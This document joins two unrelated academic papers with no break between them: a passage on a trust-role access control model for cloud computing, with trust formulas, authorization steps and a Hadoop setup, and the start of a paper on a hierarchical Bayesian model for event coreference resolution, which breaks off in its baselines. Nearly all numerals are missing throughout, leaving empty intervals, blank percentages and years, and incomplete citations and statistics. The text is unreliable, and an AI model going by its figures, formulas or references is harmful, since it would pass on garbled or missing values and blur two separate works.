Definition (entity user): the subject that accesses data resources in the cloud computing environment, denoted U.
Definition (role): the equivalent of an employee's role in an actual enterprise, denoted R.
Definition (trust degree): the degree of trust one subject places in another. In this model the trust value lies in the interval [- , ]; the greater the trust value, the higher the access rights of the subject.
Definition (access rights): the power of a subject to access system data resources. Depending on the role assigned to the subject, the subject holds different permissions.
Definition (credibility threshold): a fixed minimum value. When the trust value of an entity user is determined, it is compared with this threshold; if the user's current trust value is greater than the minimum threshold, access can proceed to the next step, otherwise access is denied.
Definition (session): an event process triggered when an entity user activates a role it owns, denoted S. A real user can activate multiple roles in one session.

C. Calculation of trust values

In a cloud computing environment, when a subject user requests access to a resource, the credibility management center calculates the user's credibility. If the credibility is greater than the credibility threshold, the authorization center can assign the corresponding role to the user, and the user can then access the object resource. In this model, trust comprises direct trust, recommended trust and historical operation trust.

1) Direct trust (DT). Direct trust is calculated from the subject's identity verification, user rights and environment information. When the user logs in to the system for the first time, he or she must provide identity information and environment information, and the system administrator calculates the user's direct trust from this information.
The formula is:

DT = w_i * r(i, s) + w_p * r(p, s) + w_e * r(e, s)

where r(i, s), r(p, s) and r(e, s) are the correlations between the entity user's identity information, rights and environment information, respectively, and system security, as determined by the security administrator, and w_i, w_p and w_e are the weights of identity information, authority and environment information in the direct trust.

2) Historical operation trust (HT). Historical operation trust is the record of behavior accumulated by the subject user during its past accesses to object resources. Accesses are divided into normal and abnormal accesses: a normal access is an access request issued within the specified time period that complies with the system security rules, while an abnormal access is one issued within the specified time period that violates them. Normal access behavior increases the user's historical operation trust, while abnormal access behavior reduces it. It is calculated as:

HT = Σ_i v_i * h(m, i, t)

where h(m, i, t) is the trust value of the i-th access of subject user m to the object resource at time t, and v_i is the coefficient assigned to that access: v_i takes a positive value for a normal access and a negative value for an abnormal access.

3) Recommended trust (RT). The recommended trust degree is the trust a subject user places in another subject as recommended by others; in general, the recommendation trust of one user for another can draw on the recommendation trust reported by other users. It is calculated as:

RT = (1/n) Σ_{i=1}^{n} s(m, i) * d(m, i)

where s(m, i) is the degree of satisfaction of entity m with entity n at the i-th operation, and d(m, i) is the score given by entity m to entity n at the i-th operation.

4) Final trust (FT). The final trust combines the direct trust obtained above with the historical operation trust and the recommended trust. The weights of the three trust degrees are w_DT, w_HT and w_RT, and the three weights sum to 1. The final trust is calculated as:

FT = w_DT * DT + w_HT * HT + w_RT * RT

D. Trust-role-based access control algorithm

When a user requests access to a resource, the cloud computing authorization center verifies the user's information and creates a session S for the subject user, establishing a trust relationship between the system and the subject user U and calculating the user's trust degree. The subject user U selects the role to be activated in this session. According to the trust constraint conditions, the system applies the user's credibility to the access rights of the role and obtains the user's currently effective access rights.
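Before turning to the algorithm steps, a small Python sketch of the trust calculation just described. The weight values, the per-access records and the exact forms of the historical and recommendation terms are illustrative assumptions based on the variable descriptions above, not the paper's implementation.

```python
from dataclasses import dataclass

@dataclass
class AccessRecord:
    h: float   # trust value h(m, i, t) of the i-th access at time t
    v: float   # coefficient v_i: positive for a normal access, negative for an abnormal one

def direct_trust(r_identity, r_rights, r_env, w=(0.4, 0.3, 0.3)):
    """DT: weighted correlation of identity, rights and environment info with system security."""
    return w[0] * r_identity + w[1] * r_rights + w[2] * r_env

def historical_trust(records):
    """HT: signed accumulation of the subject's historical access behaviour."""
    return sum(rec.v * rec.h for rec in records)

def recommendation_trust(satisfaction_scores):
    """RT: average over (satisfaction s, score d) pairs reported by other subjects."""
    if not satisfaction_scores:
        return 0.0
    return sum(s * d for s, d in satisfaction_scores) / len(satisfaction_scores)

def final_trust(dt, ht, rt, w_dt=0.5, w_ht=0.3, w_rt=0.2):
    """FT = w_dt*DT + w_ht*HT + w_rt*RT, with the three weights summing to 1."""
    return w_dt * dt + w_ht * ht + w_rt * rt
```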
The specific algorithm steps are as follows (a simplified code sketch of this flow is given after the system flowchart below):

1) When an entity user needs to access a resource, it first submits its login account and password together with the requested data resource to the cloud computing authorization center.
2) The authorization center checks the information submitted by the entity user and decides whether to establish a session; if so, it establishes a session between the system and the user and forwards the submitted information to the cloud computing role database.
3) The role database determines the role the user needs according to the information sent by the authorization center, assigns that role to the user, and forwards the information to the cloud computing trust value database.
4) The trust value database decides whether to grant the role's authority to the user according to the user's current trust value: if the current trust value is greater than the predetermined minimum threshold, the authority is granted; otherwise the request is rejected and this information is returned to the authorization center.
5) After the authorization center records the information from the trust value database, it returns an authorization success certificate to the user; the user presents this certificate to the resource database, and once the resource database has verified it, the user can access the requested data resources.
6) After the session ends, the user and the resource provider evaluate each other's satisfaction and submit the results to the trust value database, where the trust value is recalculated and updated.

IV. Application of the "Trust-Role" Access Control Model

Aiming at the security problems of the cloud environment, this paper introduces a trust mechanism into the traditional access control model, proposes the trust-role access control model, and carries out experiments in a local business system. The cloud platform is built on the Hadoop architecture: first the local database is migrated to the distributed database HBase, and then the access control model is applied in the local business system, so that the user's identity, credibility and other information are verified together. Finally, simulation experiments demonstrate the advantages of this model in terms of system throughput and data storage cost.

A. Construction of the Hadoop cloud platform

1) Install a Linux virtual machine: install VMware Workstation and create a Linux virtual machine; the Linux system is Ubuntu.
2) Install the JDK: install the JDK package (jdk-…-linux-….bin) and set its environment variables.
3) Configure password-free SSH login. Installation command: $ sudo apt-get install ssh
4) Install Hadoop, ZooKeeper and HBase: decompress the three archives (hadoop-….tar.gz, zookeeper-….tar.gz, hbase-….tar.gz) into the target folder, configure the Hadoop environment variables, and modify the configuration files of Hadoop, ZooKeeper and HBase respectively.

B. Application of the model in the local business system

1) The system flow is shown in the figure below.

Figure: Business system flowchart.
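Returning to the six-step authorization flow described above, the following Python sketch condenses it into a single access decision. The role database, permission map, trust values and threshold are hypothetical in-memory stand-ins for the cloud-side databases, not part of the paper's system.

```python
from dataclasses import dataclass, field
from typing import Optional

# Hypothetical stand-ins for the role database, permissions and trust-value database.
ROLE_DB = {"alice": "archivist"}
ROLE_PERMISSIONS = {"archivist": {"read_archive", "update_archive"}}
TRUST_DB = {"alice": 0.62}
TRUST_THRESHOLD = 0.5   # illustrative minimum credibility threshold

@dataclass
class Session:
    user: str
    role: Optional[str] = None
    permissions: set = field(default_factory=set)
    authorized: bool = False

def authorize(user: str, password_ok: bool) -> Session:
    """Sketch of the trust-role flow: verify identity, assign a role, then grant
    the role's permissions only if the user's trust value exceeds the threshold."""
    session = Session(user=user)
    if not password_ok or user not in ROLE_DB:
        return session                       # identity check failed: no rights granted
    session.role = ROLE_DB[user]
    if TRUST_DB.get(user, -1.0) > TRUST_THRESHOLD:
        session.permissions = ROLE_PERMISSIONS.get(session.role, set())
        session.authorized = True            # stands in for the authorization success certificate
    return session
```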
2) System user login processing. The user enters a login account and password, and the login request is sent to the server. On receiving the request, the server looks up the user table and the trust value table and retrieves the user's attribute information. It first checks whether the user name and password match. If the match succeeds, the user's trust components are looked up by user ID, the final trust value is computed from the three kinds of trust, and the result is compared with the threshold set by the system. If it is not smaller than the threshold, role verification is carried out and the user is granted the operating permissions corresponding to the role; the count of normal interactions is increased by one and the user's trust value is updated. If the check fails, the user cannot log in, the count of abnormal operations for that user ID is increased by one, and a new trust value is computed. The user login interface is shown in the figure.

Figure: Business system login interface.

C. Simulation experiment

The simulation experiments compare the "trust-role" access control model with the purely role-based access control model in terms of system throughput and data storage cost, as shown in the two figures below. The first figure compares the storage space the two access control methods require to store access control information, showing that the storage space required by the trust-role method does not increase significantly as the number of users grows.

Figure: Storage space comparison.
Figure: System throughput comparison.

The second figure compares the system throughput of the two access control methods: the throughput of both methods increases significantly as the number of user requests increases. However, once the number of user requests reaches a certain level, the throughput of both methods begins to decrease, although the trust-role access control method always maintains higher throughput than the role-based method.

V. Conclusion

This paper adds the concept of credibility to the traditional role-based access control model and proposes a hybrid trust-role access control model for cloud computing. The model makes up for the shortcomings of purely role-based access control. Experiments show that it has clear advantages in user authentication, and the trust-role access control model also performs well in terms of system throughput and storage space.

Acknowledgment: New Network and Inspection and Control National Local Joint Engineering Lab fund project (GSYSJ).

References
[ ] Li Qiao, Zheng Xiao. Summary of the status quo of cloud computing research [J]. Computer Science.
[ ] Chen Quan, Deng Qianni. Cloud computing and its key technologies [J]. Computer Application.
[ ] Long Qin, Liu Peng, Pan Aimin. Role-based extension manageable access control model research and implementation [J]. Computer Research and Development.
[ ] Luo Xueping, Zheng Yuli, Xu Guoding. An extended role-based access control model [J]. Computer Engineering.
[ ] Liao Junguo, Hong Fan, Xiao Haijun, et al. Fine-grained role-based access control model [J]. Computer Engineering and Applications.
[ ] Deng Yong, Zhang Lin, Wang Weichuan, et al.
research on dynamic role access control based on trust degree in grid computing [j]. computer science, , ( ): - . [ ] lin qingguo, liu yanbing. a trust-based dynamic access control strategy [j]. journal of chongqing university of posts and telecommunications (natural science edition), , ( ): - . a hierarchical distance-dependent bayesian model for event coreference resolution bishan yang claire cardie department of computer science cornell university {bishan, cardie}@cs.cornell.edu peter frazier school of operations research and information engineering cornell university pf @cornell.edu abstract we present a novel hierarchical distance- dependent bayesian model for event coref- erence resolution. while existing generative models for event coreference resolution are completely unsupervised, our model allows for the incorporation of pairwise distances be- tween event mentions — information that is widely used in supervised coreference mod- els to guide the generative clustering process- ing for better event clustering both within and across documents. we model the distances between event mentions using a feature-rich learnable distance function and encode them as bayesian priors for nonparametric cluster- ing. experiments on the ecb+ corpus show that our model outperforms state-of-the-art methods for both within- and cross-document event coreference resolution. introduction the task of event coreference resolution consists of identifying text snippets that describe events, and then clustering them such that all event mentions in the same partition refer to the same unique event. event coreference resolution can be applied within a single document or across multiple documents and is crucial for many natural language process- ing tasks including topic detection and tracking, in- formation extraction, question answering and tex- tual entailment (bejan and harabagiu, ). more importantly, event coreference resolution is a neces- sary component in any reasonable, broadly applica- ble computational model of natural language under- standing (humphreys et al., ). in comparison to entity coreference resolu- tion (ng, ), which deals with identifying and grouping noun phrases that refer to the same dis- course entity, event coreference resolution has not been extensively studied. this is, in part, because events typically exhibit a more complex structure than entities: a single event can be described via multiple event mentions, and a single event mention can be associated with multiple event arguments that characterize the participants in the event as well as spatio-temporal information (bejan and harabagiu, ). hence, the coreference decisions for event mentions usually require the interpretation of event mentions and their arguments in context. see, for example, figure , in which five event mentions across two documents all refer to the same under- lying event: plane bombs yida camp. event: plane bombs yida camp document document the {yida refugee camp} {in south sudan} was bombed {on thursday}. the {yida refugee camp} was the target of an air strike {in south sudan} {on thursday}. {two bombs} fell {within the yida camp}, including {one} {close to the school}. {at least four bombs} were reportedly dropped.{four bombs} were dropped within just a few moments - {two} {inside the camp itself }, while {the other two} {near the airstrip}. figure : examples of event coreference. 
mutually coreferent event mentions are underlined and in boldface; participant and spatio-temporal information for the high- lighted event is marked by curly brackets. most previous approaches to event coreference resolution (e.g., ahn ( ), chen et al. ( )) op- erated by extending the supervised pairwise classi- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. fication model that is widely used in entity corefer- ence resolution (e.g., ng and cardie ( )). in this framework, pairwise distances between event men- tions are modeled via event-related features (e.g., that indicate event argument compatibility), and ag- glomerative clustering is applied to greedily merge event mentions into clusters. a major drawback of this general approach is that it makes hard decisions on the merging and splitting of clusters based on heuristics derived from the pairwise distances. in addition, it only captures pairwise coreference deci- sions within a single document and can not account for signals that commonly appear across documents. more recently, bejan and harabagiu ( ; ) proposed several nonparametric bayesian models for event coreference resolution that probabilisti- cally infer event clusters both within a document and across multiple documents. their method, however, is completely unsupervised, and thus can not en- code any readily available supervisory information to guide the model toward better event clustering. to address these limitations, we propose a novel bayesian model for within- and cross-document event coreference resolution. it leverages super- vised feature-rich modeling of pairwise coreference relations and generative modeling of cluster distri- butions, and thus allows for both probabilistic in- ference over event clusters and easy incorporation of pairwise linking preferences. our model builds on the framework of the distance-dependent chi- nese restaurant process (ddcrp) (blei and frazier, ), which was introduced to incorporate data de- pendencies into nonparametric clustering models. here, however, we extend the ddcrp to allow the incorporation of feature-based, learnable dis- tance functions as clustering priors, thus encourag- ing event mentions that are close in meaning to be- long to the same cluster. in addition, we introduce to the ddcrp a representational hierarchy that allows event mentions to be grouped within a document and within-document event clusters to be grouped across documents. to investigate the effectiveness of our approach, we conduct extensive experiments on the ecb+ cor- pus (cybulska and vossen, b), an extension to eventcorefbank (ecb) (bejan and harabagiu, ) and the largest corpus available that contains event coreference annotations within and across documents. we show that integrating pairwise learning of event coreference relations with unsu- pervised hierarchical modeling of event clustering achieves promising improvements over state-of-the- art approaches for within- and cross-document event coreference resolution. related work coreference resolution in general is a difficult natu- ral language processing (nlp) task and typically re- quires sophisticated inferentially-based knowledge- intensive models (kehler, ). 
extensive work in the literature focuses on the problem of entity coref- erence resolution and many techniques have been developed, including rule-based deterministic mod- els (e.g. cardie and wagstaff ( ), raghunathan et al. ( ), lee et al. ( )) that traverse over mentions in certain orderings and make determin- istic coreference decisions based on all available information at the time; supervised learning-based models (e.g. stoyanov et al. ( ), rahman and ng ( ), durrett and klein ( )) that make use of rich linguistic features and the annotated corpora to learn more powerful coreference functions; and fi- nally, unsupervised models (e.g. bhattacharya and getoor ( ), haghighi and klein ( , )) that successfully apply generative modeling to the coreference resolution problem. event coreference resolution is a more complex task than entity coreference resolution (humphreys et al., ) and also has been relatively less stud- ied. existing work has adapted similar ideas to those used in entity coreference. humphreys et al. ( ) first proposed a deterministic cluster- ing mechanism to group event mentions of pre- specified types based on hard constraints. later ap- proaches (ahn, ; chen et al., ) applied learning-based pairwise classification decisions us- ing event-specific features to infer event clustering. bejan and harabagiu ( ; ) proposed sev- eral unsupervised generative models for event men- tion clustering based on the hierarchical dirichlet process (hdp) (teh et al., ). our approach is related to both supervised clustering and gener- ative clustering approaches. it is a nonparametric bayesian model in nature but encodes rich linguis- tic features in clustering priors. more recent work modeled both entity and event information in event coreference. lee et al. ( ) showed that itera- tively merging entity and event clusters can boost the clustering performance. liu et al. ( ) demon- strated the benefits of propagating information be- tween event arguments and event mentions during a post-processing step. other work modeled event coreference as a predicate argument alignment prob- lem between pairs of sentences, and trained clas- sifiers for making alignment decisions (roth and frank, ; wolfe et al., ). our model also leverages event argument information into the de- cisions of event coreference but incorporates it into bayesian clustering priors. most existing coreference models, both for events and entities, focus on solving the within-document coreference problem. cross-document coreference has attracted less attention due to lack of annotated corpora and the requirement for larger model capac- ity. hierarchical models (singh et al., ; wick et al., ; haghighi and klein, ) have been pop- ular choices for cross-document coreference as they can capture coreference at multiple levels of gran- ularities. our model is also hierarchical, capturing both within- and cross-document coreference. our model is also closely related to the distance-dependent chinese restaurant process (ddcrp) (blei and frazier, ). the ddcrp is an infinite clustering model that can account for data dependencies (ghosh et al., ; socher et al., ). but it is a flat clustering model and thus can- not capture hierarchical structure that usually exists in large data collections. very little work has ex- plored the use of ddcrp in hierarchical clustering models. kim and oh ( ; ghosh et al. ( ) combined a ddcrp with a standard crp in a two- level hierarchy analogous to the hdp with restricted distance functions. ghosh et al. 
( ) proposed a two-level ddcrp with data-dependent distance- based priors at both levels. our model is also a two- level ddcrp model but differs in that its distance function is learned using a feature-rich log-linear model. we also derive an effective gibbs sampler for posterior inference. action bombs participant sudan, yida refugee camp time thursday, nov , location south sudan table : mentions of event components problem formulation we adopt the terminology from ecb+ (cybulska and vossen, b), a corpus that extends the widely used eventcorefbank (ecb (bejan and harabagiu, )). an event is something that happens or a sit- uation that occurs (cybulska and vossen, a). it consists of four components: ( ) an action: what happens in the event; ( ) participants: who or what is involved; ( ) a time: when the event happens; and ( ) a location: where the event happens. we as- sume that each document in the corpus consists of a set of mentions — text spans — that describe event actions, their participants, times, and locations. ta- ble shows examples of these in the sentence “su- dan bombs yida refugee camp in south sudan on thursday, nov th, .” in this paper, we also use the term event men- tion to refer to the mention of an event action, and event arguments to refer collectively to mentions of the participants, times and locations involved in the event. event mentions are usually noun phrases or verb phrases that clearly describe events. two event mentions are considered coreferent if they refer to the same actual event, i.e. a situation involving a par- ticular combination of action, participants, time and location. note that in text, not all event arguments are always present for an event mention; they may even be distributed over different sentences. thus whether two event mentions are coreferential should be determined based on the context. for example, in figure , the event mention dropped in docu- ment corefers with air strike in the same docu- ment as they describe the same event, plane bombs yida camp, in the discourse context; it also corefers with dropped in document based on the con- texts of both documents. the problem of event coreference resolution can be divided into two sub-problems: ( ) event ex- traction: extracting event mentions and event ar- guments, and ( ) event clustering: grouping event mentions into clusters according to their corefer- ence relations. we consider both within- and cross- document event coreference resolution and hypothe- size that leveraging context information from multi- ple documents will improve both within- and cross- document coreference resolution. in the following, we first describe the event extraction step and then focus on the event clustering step. event extraction the goal of event extraction is to extract from a text all event mentions (actions) and event arguments (the associated participants, times and locations). one might expect that event actions could be ex- tracted reasonably well by identifying verb groups; and event arguments, by applying semantic role la- beling (srl) to identify, for example, the agent and patient of each predicate. unfortunately, most srl systems only handle verbal predicates and so would miss event mentions described via noun phrases. in addition, srl systems are not designed to capture event-specific arguments. 
accordingly, we found that a state-of-the-art srl system (swirl (sur- deanu et al., )) extracted only % of the ac- tions, % of participants, % of times and % of locations for events in a development set of ecb+ based on a head word matching evaluation measure. (we provide dataset details in section .) to produce higher recall, we adopt a supervised approach and train an event extractor using sen- tences from ecb+, which are annotated for event actions, participants, times and locations. be- cause these mentions vary widely in their length and grammatical type, we employ semi-markov crfs (sarawagi and cohen, ) using the loss- augmented objective of yang and cardie ( ) that provides more accurate detection of mention bound- aries. we make use of a rich feature set that includes word-level features such as unigrams, bigrams, pos tags, wordnet hypernyms, synonyms and framenet semantic roles, and phrase-level features such as phrasal syntax (e.g., np, vp) and phrasal embed- dings (constructed by averaging word embeddings produced by word vec (mikolov et al., )). our experiments on the same (held-out) development data show that the semi-crf-based extractor cor- rectly identifies % of actions, % of participants, % of times and % of locations again based on head word matching. note that the semi-crf extractor identifies event mentions and event arguments but not relation- ships among them, i.e. it does not associate argu- ments with an event mention. lacking supervi- sory data in the ecb+ corpus for training an event action-argument relation detector, we assume that all event arguments identified by the semi-crf ex- tractor are related to all event mentions in the same sentence and then apply srl-based heuristics to augment and further disambiguate intra-sentential action-argument relations (using the swirl srl). more specifically, we link each verbal event men- tion to the participants that match its arg , arg or arg semantic role fillers; similarly, we asso- ciate with the event mention the time and locations that match its am-tmp and am-loc role fillers, re- spectively. for each nominal event mention, we as- sociate those participants that match the possessor of the mention since these were suggested in lee et al. ( ) as playing the arg role for nominal predi- cates. event clustering now we describe our proposed bayesian model for event clustering. our model is a hierarchical exten- sion of the distance-dependent chinese restaurant process (ddcrp). it first groups event mentions within a document to form within-document event cluster and then groups these event clusters across documents to form global clusters. the model can account for the similarity between event mentions during the clustering process, putting a bias toward clusters comprised of event mentions that are simi- lar to each other based on the context. to capture event similarity, we use a log-linear model with rich syntactic and semantic features, and learn the feature weights using gold-standard data. . distance-dependent chinese restaurant process the distance-dependent chinese restaurant pro- cess (ddcrp) is a generalization of the chinese restaurant process (crp) that models distributions over partitions. in a crp, the generative process can be described by imagining data points as customers in a restaurant and the partitioning of data as tables at which the customers sit. 
The process randomly samples the table assignment for each customer sequentially: the probability of a customer sitting at an existing table is proportional to the number of customers already sitting at that table, and the probability of sitting at a new table is proportional to a scaling parameter. For the customers sitting at the same table, observations are drawn from a distribution determined by the parameter associated with that table. Despite the sequential sampling process, the CRP makes the assumption of exchangeability: permuting the customer ordering does not change the probability of the partitions.

The exchangeability assumption may not be reasonable for clustering data that has clear inter-dependencies. The ddCRP allows the incorporation of data dependencies in infinite clustering, encouraging data points that are closer to each other to be grouped together. In the generative process, instead of directly sampling a table assignment for each customer, it samples a customer link, linking the customer to another customer or to itself. The clustering can be uniquely constructed once the customer links are determined for all customers: two customers belong to the same cluster if and only if one can reach the other by traversing the customer links (treating these links as undirected).

More formally, consider a sequence of customers 1, ..., N, and denote a = (a_1, ..., a_N) as the assignments of the customer links. a_i ∈ {1, ..., N} is drawn from

p(a_i = j | f, α) ∝ f(i, j) if j ≠ i;  α if j = i.   (1)

where f is a distance function, f(i, j) is a value that measures the distance between customers i and j, and α is a scaling parameter measuring self-affinity. For each customer, the observation is generated by the per-table parameters as in the CRP. A ddCRP is said to be sequential if f(i, j) = 0 when i < j, so customers may link only to themselves and to previous customers.

A hierarchical extension of the ddCRP

We can model within-document coreference resolution using a sequential ddCRP. Imagining customers as event mentions and the restaurant as a document, each mention can either refer to an antecedent mention in the document or to no other mention, starting the description of a new event. However, coreference relations may also exist across documents — the same event may be described in multiple documents. It is therefore desirable to have a two-level clustering model that can group event mentions within a document and further group them across documents. We therefore propose a hierarchical extension of the ddCRP (HDDCRP) that employs a ddCRP twice: the first-level ddCRP links mentions based on within-document distances, and the second-level ddCRP links the within-document clusters based on cross-document distances, forming larger clusters in the corpus.

The generative process of an HDDCRP can be described using the same "Chinese restaurant" metaphor. Imagine a collection of documents as a collection of restaurants, and the event mentions in each document as customers entering a restaurant. The local (within-document) event clusters correspond to tables. The global (within-corpus) event clusters correspond to menus (tables that serve the same menu belong to the same cluster). The hidden variables are the customer links and the table links. The figure below shows a configuration of these variables and the corresponding clustering structure.

Figure: A cluster configuration generated by the HDDCRP. Each restaurant is represented by a rectangle. The small green circles represent customers. The ovals represent tables, and the colors reflect the clustering. Each customer is assigned a customer link (a solid arrow), linking it to itself or to another customer in the same restaurant. The customer who first sits at a table is assigned a table link (a dashed arrow), linking it to itself or to another customer in a different restaurant, resulting in the linking of the two tables.
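A small numerical sketch of drawing customer links under a sequential ddCRP prior of the form in Eq. (1); the distance matrix, scaling parameter and random-number handling are illustrative assumptions, not the paper's implementation.

```python
import numpy as np

def sample_customer_links(distances, alpha, rng=None):
    """Sample a_i for i = 0..N-1 under a sequential ddCRP prior.

    distances[i, j] holds f(i, j) >= 0; only entries with j < i are used
    (the sequential case), and alpha > 0 is the self-link scaling parameter.
    Returns an array of link targets, where links[i] == i denotes a self-link.
    """
    rng = np.random.default_rng() if rng is None else rng
    n = distances.shape[0]
    links = np.arange(n)
    for i in range(n):
        weights = np.zeros(i + 1)
        weights[:i] = distances[i, :i]   # links to earlier customers, weighted by f(i, j)
        weights[i] = alpha               # self-link: customer starts a new table
        probs = weights / weights.sum()
        links[i] = rng.choice(i + 1, p=probs)
    return links
```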
More formally, the generative process for the HDDCRP can be described as follows:

1. For each restaurant d ∈ {1, ..., D}, for each customer i ∈ {1, ..., N_d}, sample a customer link using a sequential ddCRP:

p(a_{i,d} = (j, d)) ∝ f_d(i, j) if j < i;  α_d if j = i;  0 if j > i.   (2)

2. For each restaurant d ∈ {1, ..., D}, for each table t, sample a table link for the customer (i, d) who first sits at t using a ddCRP:

p(c_{i,d} = (j, d')) ∝ f_0((i, d), (j, d')) if j ∈ {1, ..., N_{d'}} and d' ≠ d;  α_0 if j = i and d' = d.   (3)

3. Calculate the clusters z(a, c) by traversing all the customer links a and the table links c. Two customers are in the same cluster if and only if there is a path from one to the other along the links, where both table and customer links are treated as undirected.

4. For each cluster k ∈ z(a, c), sample parameters φ_k ∼ G_0(λ).

5. For each customer i in cluster k, sample an observation x_i ∼ p(·|φ_{z_i}) where z_i = k.

f_{1:D} and f_0 are distance functions that map a pair of customers to a distance value; we discuss them in detail in the section on distance functions below.

Posterior inference with Gibbs sampling

The central computational problem for the HDDCRP model is posterior inference — computing the conditional distribution of the hidden variables given the observations, p(a, c | x, α_0, f_0, α_{1:D}, f_{1:D}). The posterior is intractable because of the combinatorial number of possible link configurations. We therefore approximate the posterior using Markov chain Monte Carlo (MCMC) sampling, specifically a Gibbs sampler.

In developing this Gibbs sampler, we first observe that the generative process is equivalent to one that, in step 2, samples a table link for all customers and then, in step 3, when calculating z(a, c), includes only those table links c_{i,d} originating at customers (i, d) that started a new table, i.e. that chose a_{i,d} = (i, d).

The Gibbs sampler for the HDDCRP iteratively samples a customer link for each customer (i, d) from

p(a*_{i,d} | a_{−(i,d)}, c, x, λ) ∝ p(a*_{i,d}) h_a(x, z, λ)   (4)

where

h_a(x, z, λ) = p(x | z(a_{−(i,d)} ∪ a*_{i,d}, c), λ) / p(x | z(a_{−(i,d)}, c), λ).

After sampling all the customer links, it samples a table link for all customers (i, d) according to

p(c*_{i,d} | a, c_{−(i,d)}, x, λ) ∝ p(c*_{i,d}) h_c(x, z, λ)   (5)

where

h_c(x, z, λ) = p(x | z(a, c_{−(i,d)} ∪ c*_{i,d}), λ) / p(x | z(a, c_{−(i,d)}), λ).

For those customers (i, d) that did not start a new table, i.e. with a_{i,d} ≠ (i, d), the table link c*_{i,d} does not affect the clustering, and so h_c(x, z, λ) = 1 in this case.

Referring back to the event coreference example given earlier, the figure below shows an example variable configuration for the HDDCRP model and the corresponding coreference clusters.

Figure: An example of event clustering and the corresponding variable assignments. The assignments of a induce tables, or within-document (WD) clusters, and the assignments of c induce menus, or cross-document (CD) clusters. [INA] denotes that a variable is inactive and does not affect the clustering.
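Step 3 above recovers the clusters by treating the sampled links as undirected edges and taking connected components. A minimal union-find sketch of that construction, assuming mentions are indexed globally and table links are given only for table-opening mentions:

```python
def clusters_from_links(customer_links, table_links=None):
    """Connected components over undirected customer (and optional table) links.

    customer_links[i] = j means mention i links to mention j (i == j is a self-link).
    table_links is an optional dict {i: j} of cross-document links for table heads.
    Returns a cluster id for every mention index.
    """
    n = len(customer_links)
    parent = list(range(n))

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    def union(x, y):
        parent[find(x)] = find(y)

    for i, j in enumerate(customer_links):
        union(i, j)
    for i, j in (table_links or {}).items():
        union(i, j)

    roots = [find(i) for i in range(n)]
    ids = {r: k for k, r in enumerate(dict.fromkeys(roots))}
    return [ids[r] for r in roots]
```

Under this construction, two mentions share a cluster exactly when one can be reached from the other along the links, which is the clustering rule stated in step 3.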
in implementation, we can simplify the computa- tions of both ha(x,z,λ) and hc(x,z,λ) by using the fact that the likelihood under clustering z(a,c) can be factorized as p(x|z(a,c),λ) = ∏ k∈z(a,c) p(xz=k|λ) where xz=k denotes all customers that belong to the global cluster k. p(xz=k|λ) is the marginal proba- bility. it can be computed as p(xz=k|λ) = ∫ p(φ|λ) ∏ i∈z=k p(xi|φ)dφ where xi is the observation associated with cus- tomer i. in our problem, the observation corre- sponds to the lemmatized words in the event men- tion. we model the observed word counts using cluster-specific multinomial distributions with sym- metric dirichlet priors. . feature-based distance functions the distance functions f :d and f encode the pri- ors for the clustering distribution, preferring cluster- ing data points that are closer to each other. we con- sider event mentions as the data points and encode the similarity (or compatibility) between event men- tions as priors for event clustering. specifically, we use a log-linear model to estimate the similarity be- tween a pair of event mentions (xi,xj) fθ(xi,xj) ∝ exp{θt ψ(xi,xj)} ( ) where ψ is a feature vector, containing a rich set of features based on event mentions i and j: ( ) head word string match, ( ) head pos pair, ( ) co- sine similarity between the head word embeddings (we use the pre-trained -dimensional word em- beddings from word vec ), ( ) similarity between the words in the event mentions (based on term fre- quency (tf) vectors), ( ) the jaccard coefficient be- tween the wordnet synonyms of the head words, and ( ) similarity between the context words (a win- dow of three words before and after each event men- tion). if both event mentions involve participants, we consider the similarity between the words in the participant mentions based on the tf vectors, sim- ilarly for the time mentions and the location men- tions. if the srl role information is available, we also consider the similarity between words in each srl role, i.e. arg , arg , arg . training we train the parameter θ using logis- tic regression with an l regularizer. we construct the training data by considering all ordered pairs https://code.google.com/p/word vec/ train dev test total # documents # sentences , , , # annotated event mentions , , , # cross-document chains , # within-document chains , , , table : statistics of the ecb+ corpus of event mentions within a document, and also all pairs of event mentions across similar documents. to measure document similarity, we collect all men- tions of events, participants, times and locations in each document and compute the cosine similarity between the tf vectors constructed from all the event-related mentions. we consider two documents to be similar if their tf-based similarity is above a threshold σ (we set it to . in our experiments). after learning θ, we set the within- document distances as fd(i,j) = fθ(xi,xj), and the across-document distances as f ((i,d),(j,d ′)) = w(d,d′)fθ(xi,d,xj,d′), where w(d,d′) = exp(γsim(d,d′)) captures document similarity where sim(d,d′) is the tf-based sim- ilarity between document d and d′, and γ is a weight parameter. higher γ leads to a higher effect of document-level similarities on the linking probabilities. we set γ = in our experiments. experiments we conduct experiments using the ecb+ cor- pus (cybulska and vossen, b), the largest available dataset with annotations of both within- document (wd) and cross-document (cd) event coreference resolution. it extends ecb . 
(lee et al., ) and ecb (bejan and harabagiu, ) by adding event argument and argument type an- notations as well as adding more news documents. the cross-document coreference annotations only exist in documents that describe the same seminal event (the event that triggers the topic of the docu- ment and has interconnections with the majority of events from its surrounding textual context (bejan and harabagiu, )). we divide the dataset into a training set (topics - ), a development set (topics - ), and a test set (topics - ). table shows the statistics of the data. we performed event coreference resolution on all possible event mentions that are expressed in the documents. using the event extraction method de- scribed in section , we extracted , event men- tions, , participant mentions, , time men- tions and , location mentions in the test data, covering . %, . %, . %, . % of the an- notated event mentions, participants, time and loca- tions, respectively. we evaluate both within- and cross-document event coreference resolution. as in previous work (bejan and harabagiu, ), we evaluate cross-document coreference resolution by merg- ing all documents from the same seminal event into a meta-document and then evaluate the meta- document as in within-document coreference reso- lution. however, during inference time, we do not assume the knowledge of the mapping of documents to seminal events. we consider three widely used coreference reso- lution metrics: ( ) muc (vilain et al., ), which measures how many gold (predicted) cluster merg- ing operations are needed to recover each predicted (gold) cluster; ( ) b (bagga and baldwin, ), which measures the proportion of overlap between the predicted and gold clusters for each mention and computes the average scores; and ( ) ceaf (luo, ) (ceafe), which measures the best alignment of the gold-standard and predicted clusters. we also consider the conll f , which is the average f of the above three measures. all the scores are com- puted using the latest version (v . ) of the official conll scorer (pradhan et al., ). . baselines we compare our proposed hddcrp model (hdd- crp) to five baselines: • lemma: a heuristic method that groups all event mentions, either within or across docu- ments, which have the same lemmatized head word. it is usually considered a strong baseline for event coreference resolution. • agglomerative: a supervised clustering method for within-document event corefer- ence (chen et al., ). we extend it to within- and cross-document event coreference by performing single-link clustering in two phases: first grouping 